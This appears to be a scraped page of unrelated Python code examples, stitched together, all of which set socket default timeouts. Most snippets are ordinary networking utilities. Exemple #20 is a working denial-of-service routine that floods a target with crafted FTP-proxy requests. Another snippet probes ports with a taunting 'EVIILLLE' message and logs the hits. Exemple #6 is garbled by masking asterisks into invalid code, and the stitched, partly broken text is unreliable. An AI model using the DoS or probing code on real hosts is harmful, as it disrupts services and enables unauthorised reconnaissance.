def __init__(self, port = 9000, max_children = '32', max_data = '1024', max_depth = '1', minibufexpl = '0', debug = 0):
    """ initialize Debugger """
    socket.setdefaulttimeout(5)
    self.port       = port
    self.debug      = debug

    self.current    = None
    self.file       = None
    self.lasterror  = None
    self.msgid      = 0
    self.running    = 0
    self.stacks     = []
    self.curstack   = 0
    self.laststack  = 0
    self.bptsetlst  = {} 

    self.status        = None
    self.max_children  = max_children
    self.max_data      = max_data
    self.max_depth     = max_depth

    self.protocol   = DbgProtocol(self.port)

    self.ui         = DebugUI(minibufexpl)
    self.breakpt    = BreakPoint()

    vim.command('sign unplace *')
	def checkTraficLight(self):

		self.activityTimer.callback.remove(self.checkTraficLight)
		self.activityTimer.start(100, False)

		currentTimeoutDefault = socket.getdefaulttimeout()
		socket.setdefaulttimeout(3)
		message = ""
		picon = None
		default = True
		try:
			# TODO: Use Twisted's URL fetcher, urlopen is evil. And it can
			# run in parallel to the package update.
			status = urlopen("http://openpli.org/status/").read().split('!', 1)
			if getBoxType() in status[0].split(','):
				message = len(status) > 1 and status[1] or _("The current beta image might not be stable.\nFor more information see %s.") % ("www.openpli.org")
				picon = MessageBox.TYPE_ERROR
				default = False
		except:
			message = _("The status of the current beta image could not be checked because %s can not be reached.") % ("www.openpli.org")
			picon = MessageBox.TYPE_ERROR
			default = False
		socket.setdefaulttimeout(currentTimeoutDefault)
		if default:
			self.showDisclaimer()
		else:
			message += "\n" + _("Do you want to update your receiver?")
			self.session.openWithCallback(self.startActualUpdate, MessageBox, message, default = default, picon = picon)
Exemple #3
0
    def _get_metadata(agentConfig):
        if GCE.metadata is not None:
            return GCE.metadata

        if not agentConfig['collect_instance_metadata']:
            log.info("Instance metadata collection is disabled. Not collecting it.")
            GCE.metadata = {}
            return GCE.metadata

        socket_to = None
        try:
            socket_to = socket.getdefaulttimeout()
            socket.setdefaulttimeout(GCE.TIMEOUT)
        except Exception:
            pass

        try:
            opener = urllib2.build_opener()
            opener.addheaders = [('X-Google-Metadata-Request','True')]
            GCE.metadata = json.loads(opener.open(GCE.URL).read().strip())

        except Exception:
            GCE.metadata = {}

        try:
            if socket_to is None:
                socket_to = 3
            socket.setdefaulttimeout(socket_to)
        except Exception:
            pass
        return GCE.metadata
Exemple #4
0
def testInetConnectivity(target="http://www.google.com"):
	"""
	test if we get an answer from the specified url
	
	@param target:
	@return: bool
	"""
	printl2("", "__common__::testInetConnectivity", "S")

	import urllib2
	from   sys import version_info
	import socket

	try:
		opener = urllib2.build_opener()

		if version_info[1] >= 6:
			page = opener.open(target, timeout=2)
		else:
			socket.setdefaulttimeout(2)
			page = opener.open(target)
		if page is not None:
			printl2("success, returning TRUE", "__common__::testInetConnectivity", "D")
			printl2("", "__common__::testInetConnectivity", "C")
			return True
		else:
			printl2("failure, returning FALSE", "__common__::testInetConnectivity", "D")
			printl2("", "__common__::testInetConnectivity", "C")
			return False
	except:
		printl2("exception, returning FALSE", "__common__::testInetConnectivity", "D")
		printl2("", "__common__::testInetConnectivity", "C")
		return False
    def start_scheduler(self):
        c = self.colored
        if self.pidfile:
            platforms.create_pidlock(self.pidfile)
        beat = self.Service(app=self.app,
                            max_interval=self.max_interval,
                            scheduler_cls=self.scheduler_cls,
                            schedule_filename=self.schedule)

        print(str(c.blue('__    ', c.magenta('-'),
                  c.blue('    ... __   '), c.magenta('-'),
                  c.blue('        _\n'),
                  c.reset(self.startup_info(beat)))))
        self.setup_logging()
        if self.socket_timeout:
            logger.debug('Setting default socket timeout to %r',
                         self.socket_timeout)
            socket.setdefaulttimeout(self.socket_timeout)
        try:
            self.install_sync_handler(beat)
            beat.start()
        except Exception, exc:
            logger.critical('celerybeat raised exception %s: %r',
                            exc.__class__, exc,
                            exc_info=True)
Exemple #6
0
def main(argv=None):
    import json
    import logging
    socket.setdefaulttimeout(10)

    logging.basicConfig(
        level=logging.DEBUG, format='%(asctime)s %(levelname)-5.5s %(message)s')
    parser = argparse.ArgumentParser()
    parser.add_argument(action='store', dest='config')
    parser.add_argument(nargs='?', action='store', dest='username')
    args = parser.parse_args(argv)
    ldap = LDAP(args.config)
    username = args.username
    if not username:
        username = input("Username: "******"Password: "******"Result: %s" % json.dumps(result, sort_keys=True))

    if result["status"] == "unknown":
        print("No user named '%s' found." % username)
        raise SystemExit(1)

    if result["status"] == "reject":
        print("Authentication of user named '%s' failed." % username)
        raise SystemExit(2)

    print("Authentication successful, the user is member of the following groups: %s" % ', '.join(result.get("groups", [])))
Exemple #7
0
    def get_tags():
        socket_to = None
        try:
            socket_to = socket.getdefaulttimeout()
            socket.setdefaulttimeout(EC2.TIMEOUT)
        except Exception:
            pass

        try:
            iam_role = urllib2.urlopen(EC2.URL + "/iam/security-credentials").read().strip()
            iam_params = json.loads(urllib2.urlopen(EC2.URL + "/iam/security-credentials" + "/" + unicode(iam_role)).read().strip())
            from checks.libs.boto.ec2.connection import EC2Connection
            connection = EC2Connection(aws_access_key_id=iam_params['AccessKeyId'], aws_secret_access_key=iam_params['SecretAccessKey'], security_token=iam_params['Token'])
            instance_object = connection.get_only_instances([EC2.metadata['instance-id']])[0]

            EC2_tags = [u"%s:%s" % (tag_key, tag_value) for tag_key, tag_value in instance_object.tags.iteritems()]

        except Exception:
            log.exception("Problem retrieving custom EC2 tags")
            EC2_tags = []

        try:
            if socket_to is None:
                socket_to = 3
            socket.setdefaulttimeout(socket_to)
        except Exception:
            pass

        return EC2_tags
Exemple #8
0
def getnzb(link, title, output):
    if not os.path.isdir(output):
        try:
            os.makedirs(output)
        except:
            if len(str(sys.exc_info()[1])) > 0:
                print(sys.exc_info()[1])
            return False

    output = os.path.join(output, title.replace(' ', '_') + '.nzb')

    try:
        socket.setdefaulttimeout(30)
        urllib.request.urlretrieve(link, output)
    except:
        if len(str(sys.exc_info()[1])) > 0:
            print(sys.exc_info()[1])
        return False

    if os.path.getsize(output) == 0 or not os.path.isfile(output):
        print('Error downloading: %s' % (title))
        try:
            os.unlink(output)
        except:
            if len(str(sys.exc_info()[1])) > 0:
                print(sys.exc_info()[1])
        return False

    print('%r downloaded successfully.' % (output))
    return True
 def handle_request( self, trans, url, http_method=None, **kwd ):
     if 'Name' in kwd and not kwd[ 'Name' ]:
         # Hack: specially handle parameters named "Name" if no param_value is given
         # by providing a date / time string - guarantees uniqueness, if required.
         kwd[ 'Name' ] = time.strftime( "%a, %d %b %Y %H:%M:%S", time.gmtime() )
     if 'Comments' in kwd and not kwd[ 'Comments' ]:
         # Hack: specially handle parameters named "Comments" if no param_value is given
         # by providing a date / time string.
         kwd[ 'Comments' ] = time.strftime( "%a, %d %b %Y %H:%M:%S", time.gmtime() )
     socket.setdefaulttimeout( 600 )
     # The following calls to urllib2.urlopen() will use the above default timeout.
     try:
         if not http_method or http_method == 'get':
             page = urllib2.urlopen( url )
             response = page.read()
             page.close()
             return response
         elif http_method == 'post':
             page = urllib2.urlopen( url, urllib.urlencode( kwd ) )
             response = page.read()
             page.close()
             return response
         elif http_method == 'put':
             url += '/' + str( kwd.pop( 'id' ) ) + '?key=' + kwd.pop( 'key' )
             output = self.put( url, **kwd )
     except Exception, e:
         raise
         message = 'Problem sending request to the web application: %s.  URL: %s.  kwd: %s.  Http method: %s' % \
         ( str( e ), str( url ), str( kwd ), str( http_method )  )
         return self.handle_failure( trans, url, message )
Exemple #10
0
  def __init__(self, port=9000, max_children='32', max_data='1024', max_depth='1', minibufexpl='0', debug=0, proxy_host='localhost', proxy_port=None, proxy_key=None):
    """ initialize Debugger """
    socket.setdefaulttimeout(5)
    self.port       = port
    self.proxy_host = proxy_host
    self.proxy_port = proxy_port
    self.proxy_key  = proxy_key
    self.debug      = debug

    self.current    = None
    self.file       = None
    self.lasterror  = None
    self.msgid      = 0
    self.running    = 0
    self.stacks     = []
    self.curstack   = 0
    self.laststack  = 0
    self.bptsetlst  = {} 

    self.status        = None
    self.max_children  = max_children
    self.max_data      = max_data
    self.max_depth     = max_depth

    self.protocol   = DbgProtocol(self.port, self.proxy_host, self.proxy_port, self.proxy_key)

    self.ui         = DebugUI(minibufexpl)
    self.breakpt    = BreakPoint()

    self.file_mapping = list(vim.eval('debuggerFileMapping'))
    self.mapped_files = {}

    vim.command('sign unplace *')
Exemple #11
0
def discover(service, timeout=2, retries=1):
    group = ("239.255.255.250", 1900)
    message = "\r\n".join([
        'M-SEARCH * HTTP/1.1',
        'HOST: {0}:{1}',
        'MAN: "ssdp:discover"',
        'ST: {st}','MX: 3','',''])
    socket.setdefaulttimeout(timeout)
    responses = {}
    for _ in range(retries):
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
        sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 2)
        sock.sendto(message.format(*group, st=service), group)
        while True:
            try:
                response = SSDPResponse(sock.recv(1024))
                responses[response.location] = response
            except socket.timeout:
                break
    return responses.values()

# Example:
# import ssdp
# ssdp.discover("roku:ecp")
Exemple #12
0
def get_news_urls(module):
    """Get all urls of certain module
    
    :param module: urls of which module to get
    :returns: urls - a list of urls

    """
    urls = []

    # get index range firstly
    # http://news2.sysu.edu.cn/news01/index.htm
    req = post_module.req_get_news_urls(module)
    result = opener.open(req).read()
    start, end = get_index_range(result)

    # get urls in index.htm
    urls.extend(html_extracting.find_news_urls(result, module))

    # index1.htm to end will be crawled in the following loop
    socket.setdefaulttimeout(100)
    for i in range(int(start), int(end) + 1):
        req = post_module.req_get_news_urls(module, i)
        result = opener.open(req).read()
        urls.extend(html_extracting.find_news_urls(result, module))
    socket.setdefaulttimeout(10)

    return urls
Exemple #13
0
    def __init__(self, host, port, locationTemplate, timeout=5, ssl=False):
        """Create an instance of *HttpReader* bound to specific URL.

           Note:
               The `http_proxy` and `https_proxy` environment variables are
               respected by the underlying `urllib` stdlib module.

           Args:
               host (str): domain name or IP address of web server
               port (int): TCP port web server is listening
               locationTemplate (str): location part of the URL optionally containing @mib@
                   magic placeholder to be replaced with MIB name. If @mib@ magic is not present,
                   MIB name is appended to `locationTemplate`

           Keyword Args:
               timeout (int): response timeout
               ssl (bool): access HTTPS web site
        """
        self._url = '%s://%s:%d%s' % (ssl and 'https' or 'http',
                                      host, port, decode(locationTemplate))

        socket.setdefaulttimeout(timeout)
        self._user_agent = 'pysmi-%s; python-%s.%s.%s; %s' % (
            pysmi_version, sys.version_info[0], sys.version_info[1],
            sys.version_info[2], sys.platform
        )
Exemple #14
0
	def connect(self):
		HOST = ''
		PORT = 9000
		socket.setdefaulttimeout(3)
		self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
		try:
			self.s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
			self.s.bind((HOST, PORT))
			self.s.listen(5)
			self.queue.put("listening...")
			self.status = 'listening'
			self.conn, addr = self.s.accept()
			self.status = 'running'
			response = self.receive()
			output = {
				'addr': str(addr),
				'console': response
			}
		except socket.timeout:
			self.s.shutdown(socket.SHUT_RDWR);
			self.s.close()
			self.s = None
			output = {'response': 'Timeout. Connection closed.'}
			self.status = 'idle'

		self.queue.put(output)
Exemple #15
0
def myproxy(url):
	req = urllib2.Request(url)
	try:

		# Important or if the remote server is slow
		# all our web server threads get stuck here
		# But this is UGLY as Python does not provide per-thread
		# or per-socket timeouts thru urllib
		orignal_timeout = socket.getdefaulttimeout()
		try:
			socket.setdefaulttimeout(60)

			response = urllib2.urlopen(req)
		finally:
			# restore orignal timeoout
			socket.setdefaulttimeout(orignal_timeout)

		# XXX: How to stream respone through Zope
		# AFAIK - we cannot do it currently

		return response.read()

	except HTTPError, e:
		# Have something more useful to log output as plain urllib exception
		# using Python logging interface
		# http://docs.python.org/library/logging.html
		logger.error("Server did not return HTTP 200 when calling remote proxy URL:" + url)
		for key, value in params.items():
			logger.error(key + ": "  + value)

		# Print the server-side stack trace / error page
		logger.error(e.read())

		raise e
Exemple #16
0
    def testDefaultTimeout(self):
        # Testing default timeout
        # The default timeout should initially be None
        self.assertEqual(socket.getdefaulttimeout(), None)
        s = socket.socket()
        self.assertEqual(s.gettimeout(), None)
        s.close()

        # Set the default timeout to 10, and see if it propagates
        socket.setdefaulttimeout(10)
        self.assertEqual(socket.getdefaulttimeout(), 10)
        s = socket.socket()
        self.assertEqual(s.gettimeout(), 10)
        s.close()

        # Reset the default timeout to None, and see if it propagates
        socket.setdefaulttimeout(None)
        self.assertEqual(socket.getdefaulttimeout(), None)
        s = socket.socket()
        self.assertEqual(s.gettimeout(), None)
        s.close()

        # Check that setting it to an invalid value raises ValueError
        self.assertRaises(ValueError, socket.setdefaulttimeout, -1)

        # Check that setting it to an invalid type raises TypeError
        self.assertRaises(TypeError, socket.setdefaulttimeout, "spam")
Exemple #17
0
def discover(timeout=1.5):
    """Crude SSDP discovery. Returns a list of RxvDetails objects
       with data about Yamaha Receivers in local network"""
    socket.setdefaulttimeout(timeout)
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
    sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 2)
    sock.sendto(SSDP_MSEARCH_QUERY.encode("utf-8"), (SSDP_ADDR, SSDP_PORT))

    responses = []
    try:
        while True:
            responses.append(sock.recv(10240))
    except socket.timeout:
        pass

    results = []
    for res in responses:
        m = re.search(r"LOCATION:(.+)", res.decode('utf-8'), re.IGNORECASE)
        if not m:
            continue
        url = m.group(1).strip()
        res = rxv_details(url)
        if res:
            results.append(res)

    return results
Exemple #18
0
    def _call_api(self, api_url, err_env):
        """urlopen(), plus error handling and possible retries.

        err_env is a dict of additional info passed to the error handler
        """
        while True:  # may retry on error
            api_request = urllib2.Request(
                api_url, headers={"Accept-Encoding": "gzip"})

            log.debug("Amazon URL: %s" % api_url)

            try:
                if self.Timeout and sys.version[:3] in ["2.4", "2.5"]:
                    # urllib2.urlopen() doesn't accept timeout until 2.6
                    old_timeout = socket.getdefaulttimeout()
                    try:
                        socket.setdefaulttimeout(self.Timeout)
                        return urllib2.urlopen(api_request)
                    finally:
                        socket.setdefaulttimeout(old_timeout)
                else:
                    # the simple way
                    return urllib2.urlopen(api_request, timeout=self.Timeout)
            except:
                if not self.ErrorHandler:
                    raise

                exception = sys.exc_info()[1]  # works in Python 2 and 3
                err = {'exception': exception}
                err.update(err_env)
                if not self.ErrorHandler(err):
                    raise
 def obtain_masters(self):
     '''
     This method use the service 'list_masters' of the master_discoverer to get
     the list of discovered ROS master. Based on this list the L{SyncThread} for
     synchronization will be created.
     @see: U{master_discovery_fkie.interface_finder.get_listmaster_service()
         <http://docs.ros.org/api/master_discovery_fkie/html/modules.html#interface-finder-module>}
     '''
     if not rospy.is_shutdown():
         service_names = interface_finder.get_listmaster_service(masteruri_from_master(), False)
         for service_name in service_names:
             try:
                 with self.__lock:
                     try:
                         socket.setdefaulttimeout(5)
                         discoverMasters = rospy.ServiceProxy(service_name, DiscoverMasters)
                         resp = discoverMasters()
                         masters = []
                         master_names = [m.name for m in resp.masters]
                         rospy.loginfo("ROS masters obtained from '%s': %s", service_name, master_names)
                         for m in resp.masters:
                             if self._can_sync(m.name):  # do not sync to the master, if it is in ignore list or not in filled sync list
                                 masters.append(m.name)
                             self.update_master(m.name, m.uri, m.timestamp, m.timestamp_local, m.discoverer_name, m.monitoruri, m.online)
                         for key in set(self.masters.keys()) - set(masters):
                             self.remove_master(self.masters[key].name)
                     except rospy.ServiceException, e:
                         rospy.logwarn("ERROR Service call 'list_masters' failed: %s", str(e))
             except:
                 import traceback
                 rospy.logwarn("ERROR while initial list masters: %s", traceback.format_exc())
             finally:
                 socket.setdefaulttimeout(None)
         self.update_timer = threading.Timer(self.UPDATE_INTERVALL, self.obtain_masters)
         self.update_timer.start()
Exemple #20
0
    def remoteDos(self):
        socket.setdefaulttimeout(10) # Set the timeout to 10 seconds

        try:
            print "[+] Launching attack against %s:%d" % (self.target, self.port)

            aTime = time.time()
            for i in range(1,2000): # Commonly, 1035 queries are sufficient enough
                    if time.time() - aTime > 5: # More than XX seconds waiting, it worked
                        print
                        print "[+] Exploit works!"
                        return True

                    aTime = time.time()
                    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                    s.connect((self.target, self.port))
                    s.send("GET ftp://user:pass@localhost:%s HTTP/1.0\r\n\r\n" % int(self.port))
                    s.close()
                    sys.stdout.write("\b"*20 + "--> Connection #%d" % i)
                    sys.stdout.flush()
        except KeyboardInterrupt:
            print
            print "Aborted."

            return False
        except socket.timeout:
            if i > 50: # Count as a valid DOS condition if we sent at least 50 packets
                print
                print "[+] Exploit works!"
                return True
            else:
                raise
Exemple #21
0
    def run(self, root_url, root_host):
        # 重置存储池
        global store_pool
        store_pool = FileStorePool()

        # 设置过滤路径
        DownloadUrl.filter_host_name = root_host

        socket.setdefaulttimeout(6)
        root_my_url = DownloadUrl(root_url, root_host, None)
        self.url_queue.put(root_my_url)
 
        # if has thread running or url_queue is not empty
        while True:
            try:
                top = self.url_queue.get(timeout=30)
            except Exception:
                print '网站爬取完成'.decode('utf-8')
                break

            abs_url = top.get_abs_url()
            try:
                md5_builder = hashlib.md5()
                md5_builder.update(abs_url)
                md5_url = md5_builder.hexdigest()
            except Exception, e:
                print 'md5 build error at: %s' % abs_url
                continue

            if self.is_visited(md5_url):
                continue

            thread = DownloadThread(top, self.url_queue, self.thread_pool)
            self.thread_pool.acquire()
            thread.start()
Exemple #22
0
    def __init__(self):
        self.isAuthenticated = False
        self.loggedInUsername = ''
        self.loggedInPassword = '' # Testing only
        self.defaultPassword = ''
        self.testingHost = None
        self.authTimestampSeconds = None
        self.masterConnectionBroken = False
        socket.setdefaulttimeout(15)
        
        self.testMode = False
        # The testing.txt file is used for testing only
        testFilename = sys.path[0]
        if testFilename == '':
            testFilename = '.'
        testFilename += '/testing.txt'
        if os.path.isfile(testFilename):
            self.testMode = True
            testingFile = open(testFilename)
            for line in testingFile:
                match = re.match(r'host=([a-zA-Z0-9-]+)', line)
                if match:
                    self.testingHost = match.group(1)
                match = re.match(r'password=([a-zA-Z0-9-]+)', line)
                if match:
                    self.defaultPassword = match.group(1)

            testingFile.close()
 def changep(self):
   print 'changing proxy'
   socket.setdefaulttimeout(3.0)
   test_url = 'http://www.baidu.com'
   while True:
     try:
       proxy = random.choice(Proxypool)
       proxy =  'http://'+proxy
       print proxy
     except:
       continue
     try:
       start = time.time()
       f = urllib.urlopen(test_url,proxies={'http':proxy})
       f.close()
     except:
       continue
     else:
       end=time.time()
       dur = end - start
       print proxy,dur
       if dur <= 2:
         print 'proxy changed to'
         print proxy
         self.proxy = proxy
         self.proxy_usetime =0
         break
       else:
         continue
def da_connect(ip, port):
    try:
        socket.setdefaulttimeout(1)
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((ip, port))
        s.send('Hello! This is EVIILLLE calling! Anyone home?')
        data = s.recv(1024)

        print 'We hit something! Received' + str(data)
        print 'Logging hit on the network.'

        fo = open("hits.txt", "a")
        now = time.strftime("%c")

        # date and time representation
        print "Current date & time " + time.strftime("%c")
        toFoOut = "We hit " + str(ip) + ": " + str(port) + ": " + time.strftime("%c")

        # write to file
        fo.write(toFoOut + '\n')
        fo.close()
        print 'Wrote to log file.'

        # We want to close the connection after we opened it.
        # This is for logging open ports and nothing more at the moment.
        # Muhahahahahahaha.
        s.close()
        s.shutdown()
    
    except:
        return
def main(args, loglevel):
    logging.basicConfig(format="%(levelname)s: %(message)s", level=loglevel)

    socket.setdefaulttimeout(args.timeout)
    
    g = Github()
    with open(args.repo_file, 'r') as f:
        file_counter = 0
        for line in f.readlines():
            logging.info('Fetching repository: %s' % line)
            try:
                repo_str = line.rstrip().split('github.com/')[-1]
                repo = g.get_repo(repo_str)
                tree = repo.get_git_tree('master', recursive=True)
                files_to_download = []
                for file in tree.tree:
                    if fnmatch.fnmatch(file.path, args.wildcard):
                        files_to_download.append('https://github.com/%s/raw/master/%s' % (repo_str, file.path))
                for file in files_to_download:
                    logging.info('Downloading %s' % file)
                    file_counter += 1
                    filename = posixpath.basename(urlparse.urlsplit(file).path)
                    output_path = os.path.join(args.output_dir, filename)
                    if os.path.exists(output_path):
                        output_path += "-" + str(file_counter)
                    try:
                        urllib.urlretrieve(file, output_path)
                    except:
                        logging.error('Error downloading %s' % file)
            except:
                 logging.error('Error fetching repository %s' % line)
Exemple #26
0
def setup_modules():
    """
    Perform any global module setup needed by MyPyTutor.

    """
    import socket
    socket.setdefaulttimeout(GLOBAL_TIMEOUT)
Exemple #27
0
 def scan_block(self):
     """ ARPing the local network
     """
     conf.verb = 0
     print '[!] Beginning host scan with netmask %s...' % (self.net_mask)
     try:
         start = datetime.now()
         (ans, unans) = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=self.net_mask),timeout=1, inter=0.1,multi=True)
         elapsed = (datetime.now() - start).seconds
         print '[!] Scan of %s completed in %s seconds with %d hosts responding.'%(self.net_mask,elapsed,len(ans))
         for s, r in ans:
             ip = r[ARP].getfieldval('psrc')
             mac = r[ARP].getfieldval('hwsrc')
             if self.fingerprint:
                 host = ''
                 try:
                     if hasattr(socket, 'setdefaulttimeout'):
                         socket.setdefaulttimeout(3)
                     host = socket.gethostbyaddr(ip)[0]
                 except:
                     host = ''
                 print "\t%s : %s (%s)" % (mac, ip, host)
                 self._dbhost(mac, ip, host)
             else:
                 print '\t%s : %s' % (mac, ip)
                 self._dbhost(mac, ip, '')
             self.available_hosts[mac] = ip
     except Exception:
         Error('Error with net mask.  Cannot scan given block.')
         return
     print '\n'
def downloadPackage(strUrl, dest, module, timeout=120):
    print strUrl, dest, region, module
    print "--- prepare to download data for " + module
    if not os.path.exists(dest):
        os.makedirs(dest)
    
    socket.setdefaulttimeout(timeout)
    component = strUrl.split("/")[-1]
    componentTar = os.path.splitext(component)[-2]
    try:
        urllib.urlretrieve(strUrl, dest + os.sep + component)
    except socket.error:
        errno, errstr = sys.exc_info()[:2]
        if errno == socket.timeout:
            print "There was a timeout"
            print "--- Download failed ---"
            print "--- Clean the broken data ---"
            os.remove(dest + os.sep + component)
            print "--- Start to retry downloading ---"
            urllib.urlretrieve(strUrl, dest + os.sep + component)
        else:
            print "There was other socket error!"
    except Exception, e:
        print "Other exceptions!", e
        print "--- Download failed ---"
        print "--- Clean the broken data ---"
        os.remove(dest + os.sep + component)
        print "--- Start to retry downloading ---"
        urllib.urlretrieve(strUrl, dest + os.sep + component)
Exemple #29
0
    def _start_server(self):
        """Start up a viewing server."""
        # Start viewer server
        # IMPORTANT: if running in an IPython/Jupyter notebook,
        # use the no_ioloop=True option
        from ginga.web.pgw import ipg
        if not self._port:
            import socket
            import errno
            socket.setdefaulttimeout(0.05)
            ports = [p for p in range(8800, 9000) if
                     socket.socket().connect_ex(('127.0.0.1', p)) not in
                     (errno.EAGAIN, errno.EWOULDBLOCK)]
            self._port = ports[0]

        self._server = ipg.make_server(host=self._host,
                                       port=self._port,
                                       use_opencv=self.use_opencv,
                                       numthreads=self._threads)

        try:
            backend_check = get_ipython().config
        except NameError:
            backend_check = []
        no_ioloop = False  # ipython terminal
        if 'IPKernelApp' in backend_check:
            no_ioloop = True  # jupyter console and notebook

        self._server.start(no_ioloop=no_ioloop)
    def _get_nginx_status_stub_response(url):
        socket.setdefaulttimeout(5) # 5 seconds
        c = urllib2.urlopen(url)
        data = c.read()
        c.close()

        matchActive = re.search(r'Active connections:\s+(\d+)', data)
        matchHistory = re.search(r'\s*(\d+)\s+(\d+)\s+(\d+)', data)
        matchCurrent = re.search(r'Reading:\s*(\d+)\s*Writing:\s*(\d+)\s*'
            'Waiting:\s*(\d+)', data)

        if not matchActive or not matchHistory or not matchCurrent:
            raise Exception('Unable to parse {0}' . format(url))

        result = {}
        result['nginx_active_connections'] = int(matchActive.group(1))

        result['nginx_accepts'] = int(matchHistory.group(1))
        result['nginx_handled'] = int(matchHistory.group(2))
        result['nginx_requests'] = int(matchHistory.group(3))

        result['nginx_reading'] = int(matchCurrent.group(1))
        result['nginx_writing'] = int(matchCurrent.group(2))
        result['nginx_waiting'] = int(matchCurrent.group(3))

        return result
Exemple #31
0
 def __init__(self, args):
     win32serviceutil.ServiceFramework.__init__(self, args)
     self.hWaitStop = win32event.CreateEvent(None, 0, 0, None)
     socket.setdefaulttimeout(60)
Exemple #32
0
import socket
print(socket)
socket.setdefaulttimeout(2)
s = socket.socket()
s.connect(("192.168.95.148", 21))
ans = s.recv(1024)
print ans
#220 FreeFloat Ftp Server (Version 1.00).
Exemple #33
0
def main():
    socket.setdefaulttimeout(15)
    url_file_name = 'vis10cat.txt'
    targets = ['PieChart']
    download(url_file_name, targets)
Exemple #34
0
import logging
import os
import threading
import time
import random
import string
import aria2p
import telegram.ext as tg
from dotenv import load_dotenv
from pyrogram import Client
from telegraph import Telegraph
import socket

socket.setdefaulttimeout(600)

botStartTime = time.time()
if os.path.exists('log.txt'):
    with open('log.txt', 'r+') as f:
        f.truncate(0)

logging.basicConfig(
    format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',
    handlers=[logging.FileHandler('log.txt'),
              logging.StreamHandler()],
    level=logging.INFO)

load_dotenv('config.env')

Interval = []

# -*- coding: utf-8 -*-
"""
Created on Mon May 22 15:16:34 2017

@author: ben
"""
"""
从环评网抓取拟审核项目
"""
import os, urllib, re, csv
from pyquery import PyQuery as pq
import socket  
import time  
timeout = 200  
sleepTime=1.5  
socket.setdefaulttimeout(timeout)#这里对整个socket层设置超时时间。后续文件中如果再使用到socket,不必再设置  
headers = {
              }
def WriteText(filename,text):
    if os.path.exists(filename):
        os.remove(filename)
    try:
        fp=open(filename,'w')
        fp.write(text)
    except Exception as e:
        print(e)
        fp.close()
    fp.close()
def GetProjectList(url_cata):#项目数据存放在两个服务器上 hps.mep和www.zhb,一个服务器的地址简写了
#    resp=urllib.request.Request(url_cata,headers=headers)
    request=urllib.request.urlopen(url_cata)
#!/usr/local/bin/python
# coding: utf-8

# 引入相关模块
import socket
import select
import time
import os
import threading
import sys
import platform

max_thread = 2  # 并发最大线程数
timeout = 2  # 等待时间
socket.setdefaulttimeout(timeout)
# 设置套接字操作的超时期,timeout是一个浮点数,单位是秒。值为None表示没有超时期。
# 代表经过timeout秒后,如果还未下载成功,自动跳入下一次操作,此次下载失败。
sleep_time = 0.01  # 推迟调用线程的运行,单位是秒
disallow_sleep_time = 600  #


# 读取域名后缀列表
def get_top_level_domain_name_suffix():
    top_level_domain_name_suffix_list = list()
    # 创建一个叫top_level_domain_name_suffix_list的列表,列表类似于数组,用于储存一串信息,从0开始计数
    with open('top_level_domain_name_suffix', 'r') as f:
        for line in f:
            if not line.startswith('//'):
                # startswith() 方法用于检查字符串是否是以指定子字符串开头,如果是则返回 True,否则返回 False。
                # 如果不是以'//'开头则追加到列表
                top_level_domain_name_suffix_list.append(line)
Exemple #37
0
def request(method,
            url,
            params=None,
            data=None,
            headers=None,
            cookies=None,
            files=None,
            auth=None,
            timeout=60,
            allow_redirects=False,
            stream=False):
    """Initiate an HTTP(S) request. Returns :class:`Response` object.

    :param method: 'GET' or 'POST'
    :type method: unicode
    :param url: URL to open
    :type url: unicode
    :param params: mapping of URL parameters
    :type params: dict
    :param data: mapping of form data ``{'field_name': 'value'}`` or
        :class:`str`
    :type data: dict or str
    :param headers: HTTP headers
    :type headers: dict
    :param cookies: cookies to send to server
    :type cookies: dict
    :param files: files to upload (see below).
    :type files: dict
    :param auth: username, password
    :type auth: tuple
    :param timeout: connection timeout limit in seconds
    :type timeout: int
    :param allow_redirects: follow redirections
    :type allow_redirects: bool
    :param stream: Stream content instead of fetching it all at once.
    :type stream: bool
    :returns: Response object
    :rtype: :class:`Response`


    The ``files`` argument is a dictionary::

        {'fieldname' : { 'filename': 'blah.txt',
                         'content': '<binary data>',
                         'mimetype': 'text/plain'}
        }

    * ``fieldname`` is the name of the field in the HTML form.
    * ``mimetype`` is optional. If not provided, :mod:`mimetypes` will
      be used to guess the mimetype, or ``application/octet-stream``
      will be used.

    """
    # TODO: cookies
    socket.setdefaulttimeout(timeout)

    # Default handlers
    openers = [request3.ProxyHandler(request3.getproxies())]

    if not allow_redirects:
        openers.append(NoRedirectHandler())

    if auth is not None:  # Add authorisation handler
        username, password = auth
        password_manager = request3.HTTPPasswordMgrWithDefaultRealm()
        password_manager.add_password(None, url, username, password)
        auth_manager = request3.HTTPBasicAuthHandler(password_manager)
        openers.append(auth_manager)

    # Install our custom chain of openers
    opener = request3.build_opener(*openers)
    request3.install_opener(opener)

    if not headers:
        headers = CaseInsensitiveDictionary()
    else:
        headers = CaseInsensitiveDictionary(headers)

    if 'user-agent' not in headers:
        headers['user-agent'] = USER_AGENT

    # Accept gzip-encoded content
    encodings = [
        s.strip() for s in headers.get('accept-encoding', '').split(',')
    ]
    if 'gzip' not in encodings:
        encodings.append('gzip')

    headers['accept-encoding'] = ', '.join(encodings)

    if files:
        if not data:
            data = {}
        new_headers, data = encode_multipart_formdata(data, files)
        headers.update(new_headers)
    elif data and isinstance(data, dict):
        data = urlparse.urlencode(str_dict(data))

    # Make sure everything is encoded text
    headers = str_dict(headers)

    # if isinstance(url, str):
    #     url = url.encode('utf-8')

    if params:  # GET args (POST args are handled in encode_multipart_formdata)

        scheme, netloc, path, query, fragment = urlparse.urlsplit(url)

        if query:  # Combine query string and `params`
            url_params = urlparse.parse_qs(query)
            # `params` take precedence over URL query string
            url_params.update(params)
            params = url_params

        query = urlparse.urlencode(str_dict(params), doseq=True)
        url = urlparse.urlunsplit((scheme, netloc, path, query, fragment))

    req = Request(url, data, headers, method=method)
    return Response(req, stream)
Exemple #38
0
#!/usr/bin/python
# -*- coding: utf-8 -*-
